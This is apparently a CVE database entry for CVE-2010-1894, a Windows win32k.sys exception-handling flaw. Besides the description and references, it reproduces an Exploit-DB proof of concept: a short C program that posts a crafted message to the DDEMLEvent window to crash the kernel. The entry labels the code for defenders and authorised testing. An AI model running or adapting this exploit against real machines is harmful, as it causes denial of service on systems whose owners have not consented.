CVE-2010-1894
Description
The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability."
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)
/*
source: https://www.securityfocus.com/bid/39630/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue.
*/
#include "stdafx.h"
#include "windows.h"
int main (int argc, char * argv [])
{
    printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");
    getchar();
    HWND hwnd = FindWindow ("DDEMLEvent", NULL);
    if (hwnd == 0)
    {
        printf ("cannot find DDEMLEvent Window!\n");
        return 0;
    }
    PostMessage (hwnd, 0x4c, 0x4, 0x80000000);
    return 0;
}
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
OS impact
Windows Affected 2 releases
| Version | Status | Fixed in |
|---|---|---|
| - | Affected | - |
| - | Affected | - |
References
- http://www.us-cert.gov/cas/techalerts/TA10-222A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-048
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11769
CWEs
CWE-264